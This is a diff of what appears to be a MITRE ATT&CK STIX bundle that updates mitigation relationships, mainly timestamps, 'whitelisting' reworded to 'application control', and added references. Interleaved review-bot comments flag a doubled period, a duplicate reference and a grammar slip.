"created": "2020-01-24T14:07:56.461Z"
},
{
@@ -157312,7 +158659,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T14:58:13.326Z",
+ "modified": "2020-05-05T12:02:45.845Z",
"created": "2020-01-24T14:07:56.465Z"
},
{
@@ -157415,10 +158762,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847",
"relationship_type": "mitigates",
- "description": "Whitelist applications via known hashes.",
+ "description": "Allow applications via known hashes.",
"id": "relationship--ab27d3af-d454-4a4c-801b-ea9a6c0d4b47",
"type": "relationship",
- "modified": "2020-03-24T16:50:36.388Z",
+ "modified": "2020-06-20T20:11:42.523Z",
"created": "2020-01-24T14:21:52.950Z"
},
{
@@ -157519,7 +158866,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T19:11:19.185Z",
+ "modified": "2020-04-28T13:27:20.643Z",
"created": "2020-01-24T14:32:40.504Z"
},
{
@@ -157540,7 +158887,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T19:11:19.205Z",
+ "modified": "2020-04-28T13:27:20.646Z",
"created": "2020-01-24T14:32:40.508Z"
},
{
@@ -157551,7 +158898,7 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5",
"relationship_type": "mitigates",
- "description": "Adversaries can replace accessibility features binaries with alternate binaries to execute this technique. Identify and block potentially malicious software executed through accessibility features functionality by using application whitelisting (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
+ "description": "Adversaries can replace accessibility features binaries with alternate binaries to execute this technique. Identify and block potentially malicious software executed through accessibility features functionality by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
"id": "relationship--ccec5b80-e16a-4379-926f-08c1c821497a",
"external_references": [
{
@@ -157586,7 +158933,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T19:11:19.217Z",
+ "modified": "2020-06-20T20:11:42.530Z",
"created": "2020-01-24T14:32:40.526Z"
},
{
@@ -157626,7 +158973,7 @@
"description": "Restrict execution of Msiexec.exe to privileged accounts or groups that need to use it to lessen the opportunities for malicious usage.",
"id": "relationship--f3b4fdd4-24fa-48ed-8ffb-f80ad651c797",
"type": "relationship",
- "modified": "2020-03-29T16:31:56.222Z",
+ "modified": "2020-06-20T22:38:14.276Z",
"created": "2020-01-24T14:43:54.309Z"
},
{
@@ -157637,7 +158984,7 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c",
"relationship_type": "mitigates",
- "description": "Adversaries install new AppCertDLL binaries to execute this technique. Identify and block potentially malicious software executed through AppCertDLLs functionality by using application whitelisting (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
+ "description": "Adversaries install new AppCertDLL binaries to execute this technique. Identify and block potentially malicious software executed through AppCertDLLs functionality by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
"id": "relationship--db8a5d74-11f0-4773-aae8-43a0a6f85f61",
"external_references": [
{
@@ -157672,7 +159019,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T20:22:45.419Z",
+ "modified": "2020-06-20T20:11:42.513Z",
"created": "2020-01-24T14:47:41.986Z"
},
{
@@ -157723,7 +159070,7 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd",
"relationship_type": "mitigates",
- "description": "Adversaries can install new AppInit DLLs binaries to execute this technique. Identify and block potentially malicious software executed through AppInit DLLs functionality by using application whitelisting (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
+ "description": "Adversaries can install new AppInit DLLs binaries to execute this technique. Identify and block potentially malicious software executed through AppInit DLLs functionality by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
"id": "relationship--65fa218e-b442-41ca-8fed-bccdb5523656",
"external_references": [
{
@@ -157758,7 +159105,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T20:34:10.225Z",
+ "modified": "2020-06-20T20:11:42.528Z",
"created": "2020-01-24T14:52:25.777Z"
},
{
@@ -157837,7 +159184,7 @@
"description": "Changing UAC settings to \"Always Notify\" will give the user more visibility when UAC elevation is requested, however, this option will not be popular among users due to the constant UAC interruptions.",
"id": "relationship--5329d477-4378-4635-8da8-ed427d7863fc",
"type": "relationship",
- "modified": "2020-03-24T21:28:29.800Z",
+ "modified": "2020-05-04T19:05:30.421Z",
"created": "2020-01-24T14:56:24.415Z"
},
{
@@ -157851,7 +159198,7 @@
"description": "Microsoft released an optional patch update - KB3045645 - that will remove the \"auto-elevate\" flag within the sdbinst.exe. This will prevent use of application shimming to bypass UAC.",
"id": "relationship--e9fd0f73-917d-4d53-9843-a1314720942f",
"type": "relationship",
- "modified": "2020-03-24T21:28:29.803Z",
+ "modified": "2020-05-04T19:05:30.437Z",
"created": "2020-01-24T14:56:24.423Z"
},
{
@@ -157891,7 +159238,7 @@
"description": "Odbcconf.exe may not be necessary within a given environment.",
"id": "relationship--5a72e713-c8fb-4438-9a08-0ded824381dd",
"type": "relationship",
- "modified": "2020-03-29T17:01:32.962Z",
+ "modified": "2020-06-20T22:39:00.818Z",
"created": "2020-01-24T15:01:33.185Z"
},
{
@@ -157902,10 +159249,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071",
"relationship_type": "mitigates",
- "description": "Use application whitelisting configured to block execution of Odbcconf.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
+ "description": "Use application control configured to block execution of Odbcconf.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
"id": "relationship--8541e1a0-0cd5-44fc-bc88-c96b474bcaeb",
"type": "relationship",
- "modified": "2020-03-29T17:01:32.969Z",
+ "modified": "2020-06-20T22:39:00.823Z",
"created": "2020-01-24T15:01:33.187Z"
},
{
@@ -158131,7 +159478,7 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35",
"relationship_type": "mitigates",
- "description": "Identify and block potentially malicious software that may be executed through the Winlogon helper process by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.",
+ "description": "Identify and block potentially malicious software that may be executed through the Winlogon helper process by using application control (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.",
"id": "relationship--796ea220-2948-461b-9948-4290eec8dbf6",
"external_references": [
{
@@ -158151,7 +159498,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T16:17:22.636Z",
+ "modified": "2020-06-20T20:11:42.508Z",
"created": "2020-01-24T17:00:00.069Z"
},
{
@@ -158165,7 +159512,7 @@
"description": "Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.",
"id": "relationship--bfce35b9-7ae9-4194-83a7-5e5ff1481551",
"type": "relationship",
- "modified": "2020-03-25T16:17:22.650Z",
+ "modified": "2020-04-21T16:00:41.469Z",
"created": "2020-01-24T17:00:00.072Z"
},
{
@@ -158254,17 +159601,42 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6",
"relationship_type": "mitigates",
- "description": "Application whitelisting and software restriction tools, such as SELinux, can also aide in restricting kernel module loading. (Citation: Kernel.org Restrict Kernel Module)",
+ "description": "Application control and software restriction tools, such as SELinux, KSPP, grsecurity MODHARDEN, and Linux kernel tuning can aid in restricting kernel module loading.(Citation: Kernel.org Restrict Kernel Module)(Citation: Wikibooks Grsecurity)(Citation: Kernel Self Protection Project)(Citation: Increasing Linux kernel integrity)(Citation: LKM loading kernel restrictions) Since macOS High Sierra 10.13, Secure Kernel Extension Loading (SKEL) can also be used to restrict the loading of kernel modules.(Citation: Apple TN2459 Kernel Extensions)",
"id": "relationship--b783f90e-bd7c-4513-b15a-731637d7078d",
"external_references": [
{
"url": "https://patchwork.kernel.org/patch/8754821/",
"description": "Vander Stoep, J. (2016, April 5). [v3] selinux: restrict kernel module loadinglogin register. Retrieved April 9, 2018.",
"source_name": "Kernel.org Restrict Kernel Module"
+ },
+ {
+ "source_name": "Wikibooks Grsecurity",
+ "url": "https://en.wikibooks.org/wiki/Grsecurity/The_RBAC_System",
+ "description": "Wikibooks. (2018, August 19). Grsecurity/The RBAC System. Retrieved June 4, 2020."
+ },
+ {
+ "source_name": "Kernel Self Protection Project",
+ "url": "https://www.kernel.org/doc/html/latest/security/self-protection.html",
+ "description": "Kernel.org. (2020, February 6). Kernel Self-Protection. Retrieved June 4, 2020."
+ },
+ {
+ "source_name": "Increasing Linux kernel integrity",
+ "url": "https://linux-audit.com/increase-kernel-integrity-with-disabled-linux-kernel-modules-loading/",
+ "description": "Boelen, M. (2015, October 7). Increase kernel integrity with disabled Linux kernel modules loading. Retrieved June 4, 2020."
+ },
+ {
+ "source_name": "LKM loading kernel restrictions",
+ "url": "https://xorl.wordpress.com/2018/02/17/lkm-loading-kernel-restrictions/",
+ "description": "Pingios, A.. (2018, February 7). LKM loading kernel restrictions. Retrieved June 4, 2020."
+ },
+ {
+ "source_name": "Apple TN2459 Kernel Extensions",
+ "url": "https://developer.apple.com/library/archive/technotes/tn2459/_index.html",
+ "description": "Apple. (2018, April 19). Technical Note TN2459: User-Approved Kernel Extension Loading. Retrieved June 30, 2020."
}
],
"type": "relationship",
- "modified": "2020-03-25T16:14:29.458Z",
+ "modified": "2020-06-30T21:23:15.609Z",
"created": "2020-01-24T17:42:23.786Z"
},
{
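Review bot: The added `LKM loading kernel restrictions` reference carries a doubled period in its author field, `"description": "Pingios, A.. (2018, February 7). LKM loading kernel restrictions. Retrieved June 4, 2020."`, while every other entry in this array uses a single period after the initial; it should read `"Pingios, A. (2018, February 7). …"`. The six `(Citation: …)` tags in the new description each match a `source_name` present in `external_references`, so the citation wiring itself is consistent. The enclosing relationship object starts before this hunk.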
@@ -158290,7 +159662,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T16:14:29.497Z",
+ "modified": "2020-06-30T21:23:15.633Z",
"created": "2020-01-24T17:42:23.790Z"
},
{
@@ -158304,7 +159676,7 @@
"description": "Limit access to the root account and prevent users from loading kernel modules and extensions through proper privilege separation and limiting Privilege Escalation opportunities.",
"id": "relationship--4907e8fb-e224-49a6-aa94-5a76afa714ba",
"type": "relationship",
- "modified": "2020-03-25T16:14:29.500Z",
+ "modified": "2020-06-30T21:23:15.655Z",
"created": "2020-01-24T17:42:23.791Z"
},
{
@@ -158415,27 +159787,6 @@
"modified": "2020-03-25T16:52:26.824Z",
"created": "2020-01-24T18:38:56.145Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "course-of-action--590777b3-b475-4c7c-aaf8-f4a73b140312",
- "target_ref": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4",
- "relationship_type": "mitigates",
- "description": "On Windows 8.1 and Server 2012 R2, enable LSA Protection by setting the Registry key HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\RunAsPPL to dword:00000001. (Citation: Microsoft LSA Protection Mar 2014) LSA Protection ensures that LSA plug-ins and drivers are only loaded if they are digitally signed with a Microsoft signature and adhere to the Microsoft Security Development Lifecycle (SDL) process guidance.",
- "id": "relationship--9d6222a8-a7fd-47fc-af9f-07349128eec4",
- "external_references": [
- {
- "url": "https://technet.microsoft.com/library/dn408187.aspx",
- "description": "Microsoft. (2014, March 12). Configuring Additional LSA Protection. Retrieved November 27, 2017.",
- "source_name": "Microsoft LSA Protection Mar 2014"
- }
- ],
- "type": "relationship",
- "modified": "2020-03-25T16:52:26.852Z",
- "created": "2020-01-24T18:38:56.148Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -158572,7 +159923,7 @@
"description": "Prevent plist files from being modified by users by making them read-only.",
"id": "relationship--1ff2882e-64b3-43b1-a29a-c566c90bc24d",
"type": "relationship",
- "modified": "2020-03-25T19:47:39.141Z",
+ "modified": "2020-06-20T19:57:36.305Z",
"created": "2020-01-24T20:02:59.495Z"
},
{
@@ -158588,27 +159939,6 @@
"modified": "2020-01-24T20:02:59.498Z",
"created": "2020-01-24T20:02:59.498Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd",
- "target_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c",
- "external_references": [
- {
- "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign \u2018Bouncing Golf\u2019 Affects Middle East. Retrieved January 27, 2020.",
- "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/",
- "source_name": "Trend Micro Bouncing Golf 2019"
- }
- ],
- "description": "(Citation: Trend Micro Bouncing Golf 2019)",
- "relationship_type": "uses",
- "id": "relationship--7850d933-120b-4ae6-998d-8dc4dfd6d164",
- "type": "relationship",
- "modified": "2020-01-27T17:49:05.664Z",
- "created": "2020-01-27T17:49:05.664Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -158950,7 +160280,7 @@
"description": "Remove users from the local administrator group on systems.",
"id": "relationship--922037af-61f0-42d8-8b57-310b6b56ea5a",
"type": "relationship",
- "modified": "2020-03-27T12:11:48.883Z",
+ "modified": "2020-06-25T19:57:54.875Z",
"created": "2020-01-30T14:24:35.581Z"
},
{
@@ -158964,7 +160294,7 @@
"description": "Although UAC bypass techniques exist, it is still prudent to use the highest enforcement level for UAC when possible and mitigate bypass opportunities that exist with techniques such as [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).",
"id": "relationship--86eb3c0d-b1c1-4b52-b802-18f321450f29",
"type": "relationship",
- "modified": "2020-03-27T12:11:48.885Z",
+ "modified": "2020-06-25T19:57:54.870Z",
"created": "2020-01-30T14:24:35.595Z"
},
{
@@ -158985,7 +160315,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-27T12:11:48.909Z",
+ "modified": "2020-06-25T19:57:54.893Z",
"created": "2020-01-30T14:24:35.600Z"
},
{
@@ -159702,10 +161032,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58",
"relationship_type": "mitigates",
- "description": "Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.",
+ "description": "Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application control configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.",
"id": "relationship--387cdc83-fc81-499e-8875-e3d4789af9c3",
"type": "relationship",
- "modified": "2020-03-29T19:39:37.313Z",
+ "modified": "2020-06-20T20:11:42.829Z",
"created": "2020-02-03T16:49:58.298Z"
},
{
@@ -160339,7 +161669,7 @@
"description": "System settings can prevent applications from running that haven't been downloaded through the Apple Store which can help mitigate some of these issues. ",
"id": "relationship--819bc603-b0fe-4681-a235-3c6e9a36e3b5",
"type": "relationship",
- "modified": "2020-03-31T13:12:49.644Z",
+ "modified": "2020-06-20T22:41:20.206Z",
"created": "2020-02-05T16:16:08.599Z"
},
{
@@ -160405,7 +161735,7 @@
"description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys related to SIP and trust provider components. Components may still be able to be hijacked to suitable functions already present on disk if malicious modifications to Registry keys are not prevented. ",
"id": "relationship--90ad45d7-1980-4909-97f2-3c5a10a47deb",
"type": "relationship",
- "modified": "2020-03-27T13:19:38.782Z",
+ "modified": "2020-06-20T22:42:26.181Z",
"created": "2020-02-05T19:34:05.063Z"
},
{
@@ -160419,7 +161749,7 @@
"description": "Restrict storage and execution of SIP DLLs to protected directories, such as C:\\\\Windows, rather than user directories.",
"id": "relationship--ee2fcc2b-735d-4948-b25a-401f60fe7412",
"type": "relationship",
- "modified": "2020-03-27T13:19:38.789Z",
+ "modified": "2020-06-20T22:42:26.188Z",
"created": "2020-02-05T19:34:05.077Z"
},
{
@@ -160430,10 +161760,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc",
"relationship_type": "mitigates",
- "description": "Enable whitelisting solutions such as AppLocker and/or Device Guard to block the loading of malicious SIP DLLs.",
+ "description": "Enable application control solutions such as AppLocker and/or Device Guard to block the loading of malicious SIP DLLs.",
"id": "relationship--08dd36a7-dee0-4f25-b3dc-d030c32151f5",
"type": "relationship",
- "modified": "2020-03-27T13:19:38.797Z",
+ "modified": "2020-06-20T22:42:26.196Z",
"created": "2020-02-05T19:34:05.079Z"
},
{
@@ -160618,7 +161948,7 @@
"description": "Require signed binaries.",
"id": "relationship--3c37c043-7f27-4fb9-ba7f-bce3181849ac",
"type": "relationship",
- "modified": "2020-03-29T20:23:01.102Z",
+ "modified": "2020-06-20T22:11:46.117Z",
"created": "2020-02-10T20:43:10.389Z"
},
{
@@ -160629,10 +161959,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
"relationship_type": "mitigates",
- "description": "Use tools that restrict program execution via whitelisting by attributes other than file name for common operating system utilities that are needed.",
+ "description": "Use tools that restrict program execution via application control by attributes other than file name for common operating system utilities that are needed.",
"id": "relationship--095e5f7b-288c-4995-8045-b691602d38c9",
"type": "relationship",
- "modified": "2020-03-29T20:23:01.105Z",
+ "modified": "2020-06-20T22:11:46.134Z",
"created": "2020-02-10T20:43:10.395Z"
},
{
@@ -160646,7 +161976,7 @@
"description": "Use file system access controls to protect folders such as C:\\Windows\\System32.",
"id": "relationship--026e7bb0-2037-4bfc-b9ae-98e70530f22a",
"type": "relationship",
- "modified": "2020-03-29T20:23:01.118Z",
+ "modified": "2020-06-20T22:11:46.136Z",
"created": "2020-02-10T20:43:10.408Z"
},
{
@@ -161278,7 +162608,7 @@
}
],
"type": "relationship",
- "modified": "2020-02-25T19:23:34.479Z",
+ "modified": "2020-05-20T13:33:51.054Z",
"created": "2020-02-12T14:37:27.500Z"
},
{
@@ -161859,7 +163189,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-31T12:53:56.514Z",
+ "modified": "2020-06-17T14:25:38.393Z",
"created": "2020-02-17T21:26:44.446Z"
},
{
@@ -162114,33 +163444,33 @@
"id": "relationship--2ebbb8a5-a5f2-495d-bdf3-c49701edb26b",
"external_references": [
{
- "source_name": "Microsoft Trust Considerations Nov 2014",
+ "url": "https://technet.microsoft.com/library/cc755321.aspx",
"description": "Microsoft. (2014, November 19). Security Considerations for Trusts. Retrieved November 30, 2017.",
- "url": "https://technet.microsoft.com/library/cc755321.aspx"
+ "source_name": "Microsoft Trust Considerations Nov 2014"
},
{
- "source_name": "Microsoft SID Filtering Quarantining Jan 2009",
+ "url": "https://technet.microsoft.com/library/cc794757.aspx",
"description": "Microsoft. (n.d.). Configuring SID Filter Quarantining on External Trusts. Retrieved November 30, 2017.",
- "url": "https://technet.microsoft.com/library/cc794757.aspx"
+ "source_name": "Microsoft SID Filtering Quarantining Jan 2009"
},
{
- "source_name": "Microsoft Netdom Trust Sept 2012",
+ "url": "https://technet.microsoft.com/library/cc835085.aspx",
"description": "Microsoft. (2012, September 11). Command-Line Reference - Netdom Trust. Retrieved November 30, 2017.",
- "url": "https://technet.microsoft.com/library/cc835085.aspx"
+ "source_name": "Microsoft Netdom Trust Sept 2012"
},
{
- "source_name": "Microsoft Netdom Trust Sept 2012",
+ "url": "https://technet.microsoft.com/library/cc835085.aspx",
"description": "Microsoft. (2012, September 11). Command-Line Reference - Netdom Trust. Retrieved November 30, 2017.",
- "url": "https://technet.microsoft.com/library/cc835085.aspx"
+ "source_name": "Microsoft Netdom Trust Sept 2012"
},
{
- "source_name": "AdSecurity Kerberos GT Aug 2015",
+ "url": "https://adsecurity.org/?p=1640",
"description": "Metcalf, S. (2015, August 7). Kerberos Golden Tickets are Now More Golden. Retrieved December 1, 2017.",
- "url": "https://adsecurity.org/?p=1640"
+ "source_name": "AdSecurity Kerberos GT Aug 2015"
}
],
"type": "relationship",
- "modified": "2020-03-31T13:06:23.725Z",
+ "modified": "2020-05-29T16:34:40.559Z",
"created": "2020-02-18T18:34:49.716Z"
},
{
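Review bot: The reordered `external_references` array on the new side still contains the `Microsoft Netdom Trust Sept 2012` entry twice (the third and fourth elements are byte-identical apart from key order), and this commit only swaps `url` and `source_name` within each element, so the duplicate survives. A duplicate element is valid JSON but is the kind of drift a bundle consumer will silently double-count; unless the description deliberately cites the same source under two tags, the second `{"url": "https://technet.microsoft.com/library/cc835085.aspx", …, "source_name": "Microsoft Netdom Trust Sept 2012"}` element can be dropped. The enclosing relationship object starts before this hunk.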
@@ -162336,7 +163666,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T20:46:23.838Z",
+ "modified": "2020-05-29T15:17:30.753Z",
"created": "2020-02-19T20:36:33.642Z"
},
{
@@ -162403,8 +163733,16 @@
"target_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3",
"relationship_type": "mitigates",
"id": "relationship--f2fd105e-f481-486a-97b6-d5ef3324a787",
+ "external_references": [
+ {
+ "source_name": "Ready.gov IT DRP",
+ "url": "https://www.ready.gov/business/implementation/IT",
+ "description": "Ready.gov. (n.d.). IT Disaster Recovery Plan. Retrieved March 15, 2019."
+ }
+ ],
+ "description": "Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.",
"type": "relationship",
- "modified": "2020-03-28T22:35:27.807Z",
+ "modified": "2020-04-22T15:19:31.565Z",
"created": "2020-02-20T14:34:08.725Z"
},
{
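Review bot: The newly added `description` has a subject–verb agreement slip in its second sentence, `Ensure backups are stored off system and is protected from common methods …`; the subject is `backups`, so it should read `Ensure backups are stored off system and are protected from common methods …`. The single `(Citation: Ready.gov IT DRP)` tag matches the `source_name` added in the same hunk. The enclosing relationship object starts before this hunk.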
@@ -162417,7 +163755,7 @@
"relationship_type": "mitigates",
"id": "relationship--f57b2244-f4f6-4eb4-ac07-f14f8cb0518b",
"type": "relationship",
- "modified": "2020-03-28T22:35:27.816Z",
+ "modified": "2020-04-22T15:19:31.609Z",
"created": "2020-02-20T14:34:08.733Z"
},
{
@@ -162705,7 +164043,7 @@
"description": "Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services.",
"id": "relationship--dc1b1842-ce36-46ec-83d5-66292d65c463",
"type": "relationship",
- "modified": "2020-03-24T20:01:57.032Z",
+ "modified": "2020-07-09T17:01:18.218Z",
"created": "2020-02-20T17:14:40.155Z"
},
{
@@ -162726,7 +164064,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T20:01:57.044Z",
+ "modified": "2020-07-09T17:01:18.187Z",
"created": "2020-02-20T17:14:40.157Z"
},
{
@@ -162838,7 +164176,7 @@
"description": "Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts.",
"id": "relationship--b6583fd8-89f7-4494-8690-3456391bf193",
"type": "relationship",
- "modified": "2020-03-24T20:34:26.312Z",
+ "modified": "2020-06-09T20:46:00.630Z",
"created": "2020-02-20T18:39:33.161Z"
},
{
@@ -162864,7 +164202,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T20:34:26.340Z",
+ "modified": "2020-06-09T20:46:00.658Z",
"created": "2020-02-20T18:39:33.164Z"
},
{
@@ -162885,7 +164223,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T20:34:26.335Z",
+ "modified": "2020-06-09T20:46:00.675Z",
"created": "2020-02-20T18:39:33.165Z"
},
{
@@ -162899,7 +164237,7 @@
"description": "Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.",
"id": "relationship--aa2cd10c-5062-4abb-a8ec-0e178a5440ec",
"type": "relationship",
- "modified": "2020-03-24T20:34:26.360Z",
+ "modified": "2020-06-09T20:46:00.702Z",
"created": "2020-02-20T18:39:33.167Z"
},
{
@@ -162913,7 +164251,7 @@
"description": "Ensure that local administrator accounts have complex, unique passwords across all systems on the network.",
"id": "relationship--f9ed8046-c00b-4d8a-a8d2-833f45f1dfcb",
"type": "relationship",
- "modified": "2020-03-24T20:34:26.374Z",
+ "modified": "2020-06-09T20:46:00.701Z",
"created": "2020-02-20T18:39:33.170Z"
},
{
@@ -162924,17 +164262,22 @@
"source_ref": "course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3",
"target_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90",
"relationship_type": "mitigates",
- "description": "Consider disabling or restricting NTLM.(Citation: Microsoft Disable NTLM Nov 2012)",
+ "description": "Consider disabling or restricting NTLM.(Citation: Microsoft Disable NTLM Nov 2012) Consider disabling WDigest authentication.(Citation: Microsoft WDigest Mit)",
"id": "relationship--516e746b-6208-41db-8ea8-4e3fa42f5053",
"external_references": [
{
"url": "https://technet.microsoft.com/library/jj865668.aspx",
"description": "Microsoft. (2012, November 29). Using security policies to restrict NTLM traffic. Retrieved December 4, 2017.",
"source_name": "Microsoft Disable NTLM Nov 2012"
+ },
+ {
+ "source_name": "Microsoft WDigest Mit",
+ "url": "https://support.microsoft.com/en-us/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a",
+ "description": "Microsoft. (2014, May 13). Microsoft Security Advisory: Update to improve credentials protection and management. Retrieved June 8, 2020."
}
],
"type": "relationship",
- "modified": "2020-03-24T20:34:26.377Z",
+ "modified": "2020-06-09T20:46:00.716Z",
"created": "2020-02-20T18:39:33.171Z"
},
{
@@ -163450,7 +164793,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--f8b6eae9-cf2b-4b16-8c44-03d989533dd6",
"type": "relationship",
- "modified": "2020-02-21T22:32:09.182Z",
+ "modified": "2020-06-20T22:17:59.283Z",
"created": "2020-02-21T18:52:23.547Z"
},
{
@@ -163464,7 +164807,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--0e530e67-4e80-412f-8b38-fbc14085f05c",
"type": "relationship",
- "modified": "2020-02-21T22:34:27.105Z",
+ "modified": "2020-06-20T22:19:58.942Z",
"created": "2020-02-21T18:55:42.923Z"
},
{
@@ -163478,7 +164821,7 @@
"description": "Ensure proper process and file permissions are in place to prevent adversaries from disabling or interfering with security/logging services.",
"id": "relationship--b8113c99-fc84-4c2d-8925-cb1f5733f6eb",
"type": "relationship",
- "modified": "2020-03-29T21:49:59.831Z",
+ "modified": "2020-06-25T15:47:30.064Z",
"created": "2020-02-21T20:22:13.647Z"
},
{
@@ -163492,7 +164835,7 @@
"description": "Ensure proper user permissions are in place to prevent adversaries from disabling or interfering with security/logging services.",
"id": "relationship--7ef8afb4-2bfa-471b-a412-b1862418be3e",
"type": "relationship",
- "modified": "2020-03-29T21:49:59.853Z",
+ "modified": "2020-06-25T15:47:30.036Z",
"created": "2020-02-21T20:22:13.651Z"
},
{
@@ -163601,7 +164944,7 @@
